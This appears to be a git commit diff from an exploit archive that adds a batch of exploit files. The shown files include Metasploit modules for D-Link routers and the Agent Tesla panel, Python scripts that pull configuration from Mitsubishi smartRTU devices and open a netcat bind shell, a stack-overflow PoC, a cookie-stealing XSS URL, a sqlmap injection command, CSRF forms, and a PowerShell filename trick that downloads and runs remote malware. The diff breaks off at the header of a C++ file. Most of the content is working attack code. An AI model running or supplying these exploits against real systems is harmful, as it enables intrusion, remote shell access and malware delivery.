DB: 2019-08-15
12 changes to exploits/shellcodes Windows PowerShell - Unsanitized Filename Command Execution ABC2MTEX 1.6.1 - Command Line Stack Overflow Microsoft Windows 10 AppXSvc Deployment Service - Arbitrary File Deletion Agent Tesla Botnet - Arbitrary Code Execution (Metasploit) Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated Configuration Download Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated OS Command Injection Bind Shell SugarCRM Enterprise 9.0.0 - Cross-Site Scripting Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'customfields.php' SQL Injection D-Link DIR-600M - Authentication Bypass (Metasploit) WordPress Plugin Download Manager 2.5 - Cross-Site Request Forgery TortoiseSVN 1.12.1 - Remote Code Execution ManageEngine opManager 12.3.150 - Authenticated Code Execution
This commit is contained in:
parent
998fb1eeec
commit
7e6884af13
13 changed files with 1303 additions and 0 deletions
62
exploits/hardware/webapps/47250.rb
Executable file
62
exploits/hardware/webapps/47250.rb
Executable file
|
@ -0,0 +1,62 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: https://metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
class MetasploitModule < Msf::Auxiliary
|
||||||
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
include Msf::Auxiliary::Scanner
|
||||||
|
include Msf::Auxiliary::Report
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'CVE-2019-13101 D-Link DIR-600M Incorrect Access Control',
|
||||||
|
'Description' => %q{
|
||||||
|
This module attempts to find D-Link router DIR-600M which is
|
||||||
|
vulnerable to Incorrect Access Control. The vulnerability exists in
|
||||||
|
wan.htm, which is accessible without authentication. This
|
||||||
|
vulnerabilty can lead an attacker to manipulate WAN settings.
|
||||||
|
This module has been tested successfully on Firmware Version
|
||||||
|
3.01,3.02,3.03,3.04,3.05,3.06.
|
||||||
|
},
|
||||||
|
'Author' => [ 'Devendra Singh Solanki <devendra0x0[at]gmail.com>' ],
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
'CVE', '2019-13101'
|
||||||
|
],
|
||||||
|
'DefaultTarget' => 0,
|
||||||
|
'DisclosureDate' => 'Aug 08 2019'))
|
||||||
|
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
Opt::RPORT(80)
|
||||||
|
])
|
||||||
|
end
|
||||||
|
|
||||||
|
def run_host(ip)
|
||||||
|
res = send_request_cgi({'uri' => '/login.htm'})
|
||||||
|
if res.nil? or res.code == 404
|
||||||
|
print_error("#{rhost}:#{rport} - Host is down.")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
if res and res.code == 200 and res.body =~ /D-Link/
|
||||||
|
print_good("#{rhost}:#{rport} - It is a D-Link router")
|
||||||
|
else
|
||||||
|
print_error("#{rhost}:#{rport} - Not a D-Link router")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
res = send_request_cgi({'uri' => '/wan.htm'})
|
||||||
|
|
||||||
|
if res and res.code == 200 and res.body =~ /PPPoE/
|
||||||
|
print_good("#{rhost}:#{rport} - Router is vulnerable for
|
||||||
|
Incorrect Access Control. CVE-2019-13101")
|
||||||
|
else
|
||||||
|
print_error("#{rhost}:#{rport} - Router is with different firmware.")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
end
|
64
exploits/linux/dos/47254.txt
Normal file
64
exploits/linux/dos/47254.txt
Normal file
|
@ -0,0 +1,64 @@
|
||||||
|
Exploit Title: ABC2MTEX 1.6.1 - Command Line Stack Overflow
|
||||||
|
Date: 2019-08-13
|
||||||
|
Exploit Author: Carter Yagemann <yagemann@gatech.edu>
|
||||||
|
Vendor Homepage: https://abcnotation.com/abc2mtex/
|
||||||
|
Software Link: https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz
|
||||||
|
Version: 1.6.1
|
||||||
|
Tested on: Debian Buster
|
||||||
|
|
||||||
|
An unsafe strcpy at abc.c:241 allows an attacker to overwrite the return
|
||||||
|
address from the openIn function by providing a long input filename. This
|
||||||
|
carries similar risk to CVE-2004-1257.
|
||||||
|
|
||||||
|
Setup:
|
||||||
|
|
||||||
|
$ wget https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz
|
||||||
|
$ tar -xzf abc2mtex1.6.1.tar.gz
|
||||||
|
$ make
|
||||||
|
|
||||||
|
$ gcc --version
|
||||||
|
gcc (Debian 8.3.0-6) 8.3.0
|
||||||
|
Copyright (C) 2018 Free Software Foundation, Inc.
|
||||||
|
This is free software; see the source for copying conditions. There is NO
|
||||||
|
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
|
||||||
|
|
||||||
|
PoC:
|
||||||
|
|
||||||
|
$ ./abc2mtex AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA
|
||||||
|
|
||||||
|
GDB:
|
||||||
|
|
||||||
|
We're going to place a breakpoint before and after abc.c:241 to show the overflow.
|
||||||
|
|
||||||
|
$ gdb -q ./abc2mtex
|
||||||
|
Reading symbols from ./abc2mtex...done.
|
||||||
|
(gdb) break abc.c:241
|
||||||
|
Breakpoint 1 at 0x4139: file abc.c, line 241.
|
||||||
|
(gdb) break abc.c:242
|
||||||
|
Breakpoint 2 at 0x414c: file abc.c, line 242.
|
||||||
|
(gdb) r AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA
|
||||||
|
Starting program: /tmp/tmp.4jy8nhwOI3/abc2mtex AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA
|
||||||
|
|
||||||
|
Breakpoint 1, openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:241
|
||||||
|
241 (void) strcpy(savename,filename);
|
||||||
|
(gdb) bt
|
||||||
|
#0 openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:241
|
||||||
|
#1 0x0000555555556f00 in main (argc=2, argv=0x7fffffffe4f8) at fields.c:273
|
||||||
|
(gdb) c
|
||||||
|
Continuing.
|
||||||
|
|
||||||
|
Breakpoint 2, openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:242
|
||||||
|
242 (void) strcat(filename,".abc");
|
||||||
|
(gdb) bt
|
||||||
|
#0 openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:242
|
||||||
|
#1 0x0000414243444546 in ?? ()
|
||||||
|
#2 0x00007fffffffe4f8 in ?? ()
|
||||||
|
#3 0x0000000200000000 in ?? ()
|
||||||
|
#4 0x0000000000000000 in ?? ()
|
||||||
|
(gdb) c
|
||||||
|
Continuing.
|
||||||
|
file "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA" does not exist
|
||||||
|
|
||||||
|
Program received signal SIGSEGV, Segmentation fault.
|
||||||
|
0x0000414243444546 in ?? ()
|
||||||
|
(gdb) quit
|
106
exploits/php/remote/47256.rb
Executable file
106
exploits/php/remote/47256.rb
Executable file
|
@ -0,0 +1,106 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: https://metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
class MetasploitModule < Msf::Exploit::Remote
|
||||||
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
|
def initialize(info={})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => "Tesla Agent Remote Code Execution",
|
||||||
|
'Description' => %q{
|
||||||
|
This module exploits the command injection vulnerability of tesla agent botnet panel.
|
||||||
|
},
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Author' =>
|
||||||
|
[
|
||||||
|
'Ege Balcı <ege.balci@invictuseurope.com>' # author & msf module
|
||||||
|
],
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
['URL', 'https://prodaft.com']
|
||||||
|
],
|
||||||
|
'DefaultOptions' =>
|
||||||
|
{
|
||||||
|
'SSL' => false,
|
||||||
|
'WfsDelay' => 5,
|
||||||
|
},
|
||||||
|
'Platform' => ['php'],
|
||||||
|
'Arch' => [ ARCH_PHP ],
|
||||||
|
'Targets' =>
|
||||||
|
[
|
||||||
|
['PHP payload',
|
||||||
|
{
|
||||||
|
'Platform' => 'PHP',
|
||||||
|
'Arch' => ARCH_PHP,
|
||||||
|
'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/bind_tcp'}
|
||||||
|
}
|
||||||
|
]
|
||||||
|
],
|
||||||
|
'Privileged' => false,
|
||||||
|
'DisclosureDate' => "July 10 2018",
|
||||||
|
'DefaultTarget' => 0
|
||||||
|
))
|
||||||
|
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
OptString.new('TARGETURI', [true, 'The URI of the tesla agent with panel path', '/WebPanel/']),
|
||||||
|
]
|
||||||
|
)
|
||||||
|
end
|
||||||
|
|
||||||
|
def check
|
||||||
|
res = send_request_cgi(
|
||||||
|
'method' => 'GET',
|
||||||
|
'uri' => normalize_uri(target_uri.path, '/server_side/scripts/server_processing.php'),
|
||||||
|
)
|
||||||
|
#print_status(res.body)
|
||||||
|
if res && res.body.include?('SQLSTATE')
|
||||||
|
Exploit::CheckCode::Appears
|
||||||
|
else
|
||||||
|
Exploit::CheckCode::Safe
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
check
|
||||||
|
|
||||||
|
name = '.'+Rex::Text.rand_text_alpha(4)+'.php'
|
||||||
|
|
||||||
|
res = send_request_cgi(
|
||||||
|
'method' => 'GET',
|
||||||
|
'uri' => normalize_uri(target_uri.path,'/server_side/scripts/server_processing.php'),
|
||||||
|
'encode_params' => true,
|
||||||
|
'vars_get' => {
|
||||||
|
'table' => 'passwords',
|
||||||
|
'primary' => 'password_id',
|
||||||
|
'clmns' => 'a:1:{i:0;a:3:{s:2:"db";s:3:"pwd";s:2:"dt";s:8:"username";s:9:"formatter";s:4:"exec";}}',
|
||||||
|
'where' => Rex::Text.encode_base64("1=1 UNION SELECT \"echo #{Rex::Text.encode_base64(payload.encoded)} | base64 -d > #{name}\"")
|
||||||
|
}
|
||||||
|
)
|
||||||
|
|
||||||
|
if res && res.code == 200 && res.body.include?('recordsTotal')
|
||||||
|
print_good("Payload uploaded as #{name}")
|
||||||
|
else
|
||||||
|
print_error('Payload upload failed :(')
|
||||||
|
Msf::Exploit::Failed
|
||||||
|
end
|
||||||
|
|
||||||
|
|
||||||
|
res = send_request_cgi({
|
||||||
|
'method' => 'GET',
|
||||||
|
'uri' => normalize_uri(target_uri.path,'/server_side/scripts/',name)}, 5
|
||||||
|
)
|
||||||
|
|
||||||
|
if res && res.code == 200
|
||||||
|
print_good("Payload successfully triggered !")
|
||||||
|
else
|
||||||
|
print_error('Payload trigger failed :(')
|
||||||
|
Msf::Exploit::Failed
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
end
|
38
exploits/php/webapps/47234.py
Executable file
38
exploits/php/webapps/47234.py
Executable file
|
@ -0,0 +1,38 @@
|
||||||
|
#!/usr/bin/python
|
||||||
|
|
||||||
|
# Exploit Title: Mitsubishi Electric smartRTU & INEA ME-RTU Unauthenticated Configuration Download
|
||||||
|
# Date: 29 June 2019
|
||||||
|
# Exploit Author: (@xerubus | mogozobo.com)
|
||||||
|
# Vendor Homepage: https://eu3a.mitsubishielectric.com/fa/en/products/cnt/plcccl/items/smartRTU/local
|
||||||
|
# Vendor Homepage: http://www.inea.si/en/telemetrija-in-m2m-produkti/mertu-en/
|
||||||
|
# Firmware Version: Misubishi Electric 2.02 & INEA 3.0
|
||||||
|
# CVE-ID: CVE-2019-14927
|
||||||
|
# Full write-up: https://www.mogozobo.com/?p=3593
|
||||||
|
|
||||||
|
import sys, os, requests, socket
|
||||||
|
|
||||||
|
os.system('clear')
|
||||||
|
|
||||||
|
print("""\
|
||||||
|
_ _
|
||||||
|
___ (~ )( ~)
|
||||||
|
/ \_\ \/ /
|
||||||
|
| D_ ]\ \/ -= Conf_Me-smartRTU by @xerubus =-
|
||||||
|
| D _]/\ \ -= We all have something to hide =-
|
||||||
|
\___/ / /\ \\
|
||||||
|
(_ )( _)
|
||||||
|
@Xerubus
|
||||||
|
""")
|
||||||
|
|
||||||
|
host = raw_input("Enter RTU IP address: ")
|
||||||
|
|
||||||
|
php_page = '/saveSettings.php'
|
||||||
|
url = "http://{}{}".format(host, php_page)
|
||||||
|
|
||||||
|
print "[+] Attempting to download smartRTU configuration file"
|
||||||
|
|
||||||
|
r = requests.get(url)
|
||||||
|
if r.status_code == 200:
|
||||||
|
print "[+] Successfully obtained smartRTU configuration file.. saving to smartRTU_conf.xml\n"
|
||||||
|
with open('smartRTU_conf.xml', 'w') as f:
|
||||||
|
f.write(r.content)
|
69
exploits/php/webapps/47235.py
Executable file
69
exploits/php/webapps/47235.py
Executable file
|
@ -0,0 +1,69 @@
|
||||||
|
#!/usr/bin/python
|
||||||
|
|
||||||
|
# Exploit Title: Mitsubishi Electric smartRTU & INEA ME-RTU Unauthenticated OS Command Injection
|
||||||
|
# Date: 29 June 2019
|
||||||
|
# Exploit Author: (@xerubus | mogozobo.com)
|
||||||
|
# Vendor Homepage: https://eu3a.mitsubishielectric.com/fa/en/products/cnt/plcccl/items/smartRTU/local
|
||||||
|
# Vendor Homepage: http://www.inea.si/en/telemetrija-in-m2m-produkti/mertu-en/
|
||||||
|
# Firmware Version: Misubishi Electric 2.02 & INEA 3.0
|
||||||
|
# CVE-ID: CVE-2019-14931
|
||||||
|
# Full write-up: https://www.mogozobo.com/?p=3593
|
||||||
|
|
||||||
|
import sys, os, requests, socket
|
||||||
|
|
||||||
|
os.system('clear')
|
||||||
|
|
||||||
|
print("""\
|
||||||
|
_ _
|
||||||
|
___ (~ )( ~)
|
||||||
|
/ \_\ \/ /
|
||||||
|
| D_ ]\ \/ -= Bind_Me-smartRTU by @xerubus =-
|
||||||
|
| D _]/\ \ -= We all have something to hide =-
|
||||||
|
\___/ / /\ \\
|
||||||
|
(_ )( _)
|
||||||
|
@Xerubus
|
||||||
|
""")
|
||||||
|
|
||||||
|
host = raw_input("Enter RTU IP address: ")
|
||||||
|
port = raw_input("Enter bind shell port number: ")
|
||||||
|
|
||||||
|
php_page = '/action.php'
|
||||||
|
url = "http://{}{}".format(host, php_page)
|
||||||
|
payload = {'host' : ';sudo /usr/sbin/service ../../bin/nc -nvlp '+port+' -e /bin/sh&PingCheck=Test'}
|
||||||
|
|
||||||
|
print "\n[+] Building payload"
|
||||||
|
print "[+] Sending payload"
|
||||||
|
print "[+] Attempting connection to smartRTU"
|
||||||
|
|
||||||
|
try:
|
||||||
|
r = requests.post(url, data=payload, timeout=1)
|
||||||
|
except:
|
||||||
|
pass
|
||||||
|
|
||||||
|
port = (int(port))
|
||||||
|
|
||||||
|
try:
|
||||||
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||||
|
s.connect((host, port))
|
||||||
|
|
||||||
|
try :
|
||||||
|
print "[+] Connected to the smartRTU!\n"
|
||||||
|
while 1:
|
||||||
|
cmd = raw_input("(smartRTU-shell) # ");
|
||||||
|
s.send(cmd + "\n");
|
||||||
|
result = s.recv(1024).strip();
|
||||||
|
if not len(result) :
|
||||||
|
print "\n[!] Play nice now skiddies....\n\n"
|
||||||
|
s.close();
|
||||||
|
break;
|
||||||
|
print(result);
|
||||||
|
|
||||||
|
except KeyboardInterrupt:
|
||||||
|
print "\n[+] ^C Received, closing connection"
|
||||||
|
s.close();
|
||||||
|
except EOFError:
|
||||||
|
print "\n[+] ^D Received, closing connection"
|
||||||
|
s.close();
|
||||||
|
|
||||||
|
except socket.error:
|
||||||
|
print "[!] Failed to connect to bind shell."
|
30
exploits/php/webapps/47247.txt
Normal file
30
exploits/php/webapps/47247.txt
Normal file
|
@ -0,0 +1,30 @@
|
||||||
|
# Exploit Title: 0Day UnauthenticatedXSS SugarCRM Enterprise
|
||||||
|
# Google Dork: N/A
|
||||||
|
# Date: 11.08.2019
|
||||||
|
# Exploit Author: Ilca Lucian Florin
|
||||||
|
# Vendor Homepage: https://www.sugarcrm.com
|
||||||
|
# Version: 9.0.0
|
||||||
|
# Tested on: Windows 7 / Internet Explorer 11 / Google Chrome 76
|
||||||
|
# CVE : 2019-14974
|
||||||
|
|
||||||
|
The application fails to sanitize user input on https://sugarcrm-qms.XXX.com/mobile/error-not-supported-platform.html and reflect the input directly in the HTTP response, allowing the hacker to exploit the vulnerable parameter and have malicious content executed in the victim's browser.
|
||||||
|
|
||||||
|
Steps to reproduce:
|
||||||
|
|
||||||
|
1.Attacker will craft a malicious payload and create a legitimate link with the payload included;
|
||||||
|
2. Attacker will send the link to the victim;
|
||||||
|
3. Upon clicking on the link, the malicious payload will be reflected in the response and executed in the victim’s browser.
|
||||||
|
|
||||||
|
The behavior can be observed by visiting the following URL:
|
||||||
|
|
||||||
|
https://server/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(document.cookie);//itms://
|
||||||
|
|
||||||
|
Clicking on FULL VERSION OF WEBSITE will trigger the XSS.
|
||||||
|
|
||||||
|
Impact statement:
|
||||||
|
|
||||||
|
Although requiring user interaction, reflected XSS impact might range from web defacement to stealing user info and full account takeover, depending on the circumstances.
|
||||||
|
|
||||||
|
Recommendation:
|
||||||
|
|
||||||
|
Always ensure to validate parameters input and encode the output.
|
23
exploits/php/webapps/47249.txt
Normal file
23
exploits/php/webapps/47249.txt
Normal file
|
@ -0,0 +1,23 @@
|
||||||
|
#Exploit Title: Joomla! component com_jsjobs - 'customfields.php' SQL Injection
|
||||||
|
#Dork: inurl:"index.php?option=com_jsjobs"
|
||||||
|
#Date: 13.08.19
|
||||||
|
#Exploit Author: qw3rTyTy
|
||||||
|
#Vendor Homepage: https://www.joomsky.com/
|
||||||
|
#Software Link: https://www.joomsky.com/5/download/1
|
||||||
|
#Version: 1.2.5
|
||||||
|
#Tested on: Debian/nginx/joomla 3.9.0
|
||||||
|
#####################################
|
||||||
|
#Vulnerability details:
|
||||||
|
#####################################
|
||||||
|
Vulnerable code is in line 171 in file site/models/customfields.php
|
||||||
|
|
||||||
|
169 function dataForDepandantField( $val , $childfield){
|
||||||
|
170 $db = $this->getDBO();
|
||||||
|
171 $query = "SELECT userfieldparams,fieldtitle FROM `#__js_job_fieldsordering` WHERE field = '".$childfield."'"; //!!!
|
||||||
|
172 $db->setQuery($query);
|
||||||
|
173 $data = $db->loadObject();
|
||||||
|
|
||||||
|
#####################################
|
||||||
|
#PoC:
|
||||||
|
#####################################
|
||||||
|
$> sqlmap.py -u "http://localhost/index.php?option=com_jsjobs&task=customfields.datafordepandantfield&fvalue=0&child=0" --random-agent --dbms=mysql --method GET -p child --technique E
|
51
exploits/php/webapps/47251.txt
Normal file
51
exploits/php/webapps/47251.txt
Normal file
|
@ -0,0 +1,51 @@
|
||||||
|
# Exploit Title: CSRF vulnerabilities in WordPress Download Manager Plugin 2.5
|
||||||
|
# Google Dork: inurl:"/wp-content/plugins/download-manager
|
||||||
|
# Date: 24 may, 2019
|
||||||
|
# Exploit Author: Princy Edward
|
||||||
|
# Exploit Author Blog : https://prinyedward.blogspot.com/
|
||||||
|
# Vendor Homepage: https://www.wpdownloadmanager.com/
|
||||||
|
# Software Link: https://wordpress.org/plugins/download-manager/
|
||||||
|
# Tested on: Apache/2.2.24 (CentOS)
|
||||||
|
POC
|
||||||
|
|
||||||
|
#1
|
||||||
|
|
||||||
|
There is no CSRF nonce check performed in "POST
|
||||||
|
/wp-admin/admin-ajax.php?action=wpdm_save_email_setting" request.
|
||||||
|
|
||||||
|
#Code
|
||||||
|
|
||||||
|
<form method="POST"
|
||||||
|
action="http://localhost/wp-admin/admin-ajax.php?action=wpdm_save_email_setting">
|
||||||
|
<input type="hidden" name="__wpdm_email_template" value="default.html">
|
||||||
|
<input type="hidden" name="__wpdm_email_setting[logo]"
|
||||||
|
value="https://hacker.jpg">
|
||||||
|
<input type="hidden" name="__wpdm_email_setting[banner]"
|
||||||
|
value="https://hacker.jpg">
|
||||||
|
<input type="hidden" name="__wpdm_email_setting[footer_text]"
|
||||||
|
value="https://malicious-url.com"><input type="hidden" name="__wpdm_email_setting[facebook]"
|
||||||
|
value="https://malicious-url.com">
|
||||||
|
<input type="hidden" name="__wpdm_email_setting[twitter]" value="https://malicious-url.com">
|
||||||
|
<input type="hidden" name="__wpdm_email_setting[youtube]"
|
||||||
|
value="https://malicious-url.com">
|
||||||
|
<input type="submit">
|
||||||
|
</form>
|
||||||
|
|
||||||
|
#2
|
||||||
|
|
||||||
|
There is no CSRF nonce check performed in "POST
|
||||||
|
/wp-admin/edit.php?post_type=wpdmpro&page=templates&_type=email&task=EditEmailTemplat
|
||||||
|
e&id=default" request.
|
||||||
|
|
||||||
|
#Code
|
||||||
|
|
||||||
|
<form method="POST"
|
||||||
|
action="http://localhost/wp-admin/edit.php?post_type=wpdmpro&page=templates&_type=email&
|
||||||
|
task=EditEmailTemplate&id=default">
|
||||||
|
<input type="hidden" name="id" value="default">
|
||||||
|
<input type="hidden" name="email_template[subject]" value="forget password">
|
||||||
|
<input type="hidden" name="email_template[message]" value="aaa">
|
||||||
|
<input type="hidden" name="email_template[from_name]" value="hacker">
|
||||||
|
<input type="hidden" name="email_template[from_email]" value="hacker@hacker.com">
|
||||||
|
<input type="submit">
|
||||||
|
</form>
|
144
exploits/windows/dos/47248.py
Executable file
144
exploits/windows/dos/47248.py
Executable file
|
@ -0,0 +1,144 @@
|
||||||
|
'''
|
||||||
|
[+] Credits: John Page (aka hyp3rlinx)
|
||||||
|
[+] Website: hyp3rlinx.altervista.org
|
||||||
|
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt
|
||||||
|
[+] ISR: Apparition Security
|
||||||
|
|
||||||
|
|
||||||
|
[Vendor]
|
||||||
|
www.microsoft.com
|
||||||
|
|
||||||
|
|
||||||
|
[Product]
|
||||||
|
Windows PowerShell
|
||||||
|
|
||||||
|
Windows PowerShell is a Windows command-line shell designed especially for system administrators.
|
||||||
|
PowerShell includes an interactive prompt and a scripting environment that can be used independently or in combination.
|
||||||
|
|
||||||
|
|
||||||
|
[Vulnerability Type]
|
||||||
|
Unsanitized Filename Command Execution
|
||||||
|
|
||||||
|
|
||||||
|
[CVE Reference]
|
||||||
|
N/A
|
||||||
|
|
||||||
|
|
||||||
|
[Security Issue]
|
||||||
|
PowerShell can potentially execute arbitrary code when running specially named scripts due to trusting unsanitized filenames.
|
||||||
|
This occurs when ".ps1" files contain semicolons ";" or spaces as part of the filename, causing the execution of a different trojan file;
|
||||||
|
or the running of unexpected commands straight from the filename itself without the need for a second file.
|
||||||
|
|
||||||
|
For trojan files it doesn't need to be another PowerShell script and can be one of the following ".com, .exe, .bat, .cpl, .js, .vbs and .wsf.
|
||||||
|
Therefore, the vulnerably named file ".\Hello;World.ps1" will instead execute "hello.exe", if that script is invoked using the standard
|
||||||
|
Windows shell "cmd.exe" and "hello.exe" resides in the same directory as the vulnerably named script.
|
||||||
|
|
||||||
|
However, when such scripts are run from PowerShells shell and not "cmd.exe" the "&" (call operator) will block our exploit from working.
|
||||||
|
|
||||||
|
Still, if the has user enabled ".ps1" scripts to open with PowerShell as its default program, all it takes is double click the file to trigger
|
||||||
|
the exploit and the "& call operator" will no longer save you. Also, if the user has not enabled PowerShell to open .ps1 scripts
|
||||||
|
as default; then running the script from cmd.exe like: c:\>powershell "\Hello;World.ps1" will also work without dropping into the PowerShell shell.
|
||||||
|
|
||||||
|
My PoC will download a remote executable save it to the victims machine and then execute it, and the PS files contents are irrelevant.
|
||||||
|
Also, note I use "%CD" to target the current working directory where the vicitm has initially opened it, after it calls "iwr" (invoke-webrequest)
|
||||||
|
abbreviated for space then it sleeps for 2 seconds and finally executes.
|
||||||
|
|
||||||
|
C:\>powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'"))
|
||||||
|
|
||||||
|
This can undermine the integrity of PowerShell as it potentially allows unexpected code execution; even when the scripts contents are visually reviewed.
|
||||||
|
We may also be able to bypass some endpoint protection or IDS systems that may look at the contents or header of a file but not its filename where are
|
||||||
|
commands can be stored.
|
||||||
|
|
||||||
|
For this to work the user must have enabled PowerShell as its default program when opening ".ps1" files.
|
||||||
|
|
||||||
|
First, we create a Base64 encoded filename for obfuscation; that will download and execute a remote executable named in this case "n.exe".
|
||||||
|
c:\>powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'"))
|
||||||
|
|
||||||
|
Give the PS script a normal begining name, then separate commands using ";" semicolon e.g.
|
||||||
|
|
||||||
|
Test;powershell -e <BASE64 ENCODED COMMANDS>;2.ps1
|
||||||
|
|
||||||
|
Create the executable without a file extension to save space for the filename then save it back using the -O parameter.
|
||||||
|
The "-e" is abbreviated for EncodedCommand to again save filename space.
|
||||||
|
|
||||||
|
Host the executable on web-server or just use python -m SimpleHTTPServer 80 or whatever.
|
||||||
|
Double click to open in PowerShell watch the file get downloaded saved and executed!
|
||||||
|
|
||||||
|
My example is used as a "filename embedded downloader", but obviously we can just call other secondary trojan files of various types in the same directory.
|
||||||
|
|
||||||
|
Note: User interaction is required, and obviously running any random PS script is dangerous... but hey we looked at the file content and it simply printed a string!
|
||||||
|
|
||||||
|
|
||||||
|
[Exploit / PoC]
|
||||||
|
'''
|
||||||
|
|
||||||
|
from base64 import b64encode
|
||||||
|
import argparse,sys
|
||||||
|
#Windows PowerShell - Unsantized Filename Command Execution Vulnerability PoC
|
||||||
|
#Create ".ps1" files with Embedded commands to download, save and execute malware within a PowerShell Script Filename.
|
||||||
|
#Expects hostname/ip-addr of web-server housing the exploit.
|
||||||
|
#By hyp3rlinx
|
||||||
|
#Apparition Security
|
||||||
|
#====================
|
||||||
|
|
||||||
|
|
||||||
|
def parse_args():
|
||||||
|
parser.add_argument("-i", "--ipaddress", help="Remote server to download and exec malware from.")
|
||||||
|
parser.add_argument("-m", "--local_malware_name", help="Name for the Malware after downloading.")
|
||||||
|
parser.add_argument("-r", "--remote_malware_name", help="Malwares name on remote server.")
|
||||||
|
return parser.parse_args()
|
||||||
|
|
||||||
|
def main(args):
|
||||||
|
PSEmbedFilenameMalwr=""
|
||||||
|
if args.ipaddress:
|
||||||
|
PSEmbedFilenameMalwr = "powershell iwr "+args.ipaddress+"/"+args.remote_malware_name+" -O %CD%\\"+args.local_malware_name+" ;sleep -s 2;start "+args.local_malware_name
|
||||||
|
return b64encode(PSEmbedFilenameMalwr.encode('UTF-16LE'))
|
||||||
|
|
||||||
|
def create_file(payload):
|
||||||
|
f=open("Test;PowerShell -e "+payload+";2.ps1", "w")
|
||||||
|
f.write("Write-Output 'Have a nice day!'")
|
||||||
|
f.close()
|
||||||
|
|
||||||
|
if __name__=="__main__":
|
||||||
|
|
||||||
|
parser = argparse.ArgumentParser()
|
||||||
|
PSCmds = main(parse_args())
|
||||||
|
|
||||||
|
if len(sys.argv)==1:
|
||||||
|
parser.print_help(sys.stderr)
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
create_file(PSCmds)
|
||||||
|
print "PowerShell - Unsantized Filename Command Execution File created!"
|
||||||
|
print "By hyp3rlinx"
|
||||||
|
|
||||||
|
'''
|
||||||
|
[POC Video URL]
|
||||||
|
https://www.youtube.com/watch?v=AH33RW9g8J4
|
||||||
|
|
||||||
|
|
||||||
|
[Network Access]
|
||||||
|
Remote
|
||||||
|
|
||||||
|
|
||||||
|
[Severity]
|
||||||
|
High
|
||||||
|
|
||||||
|
|
||||||
|
[Disclosure Timeline]
|
||||||
|
Vendor Notification: July 20, 2019
|
||||||
|
MSRC "does not meet the bar for security servicing" : July 23, 2019
|
||||||
|
August 1, 2019 : Public Disclosure
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
[+] Disclaimer
|
||||||
|
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
||||||
|
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
||||||
|
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
||||||
|
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
||||||
|
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
||||||
|
or exploits by the author or elsewhere. All content (c).
|
||||||
|
'''
|
||||||
|
|
||||||
|
hyp3rlinx
|
244
exploits/windows/local/47253.cpp
Normal file
244
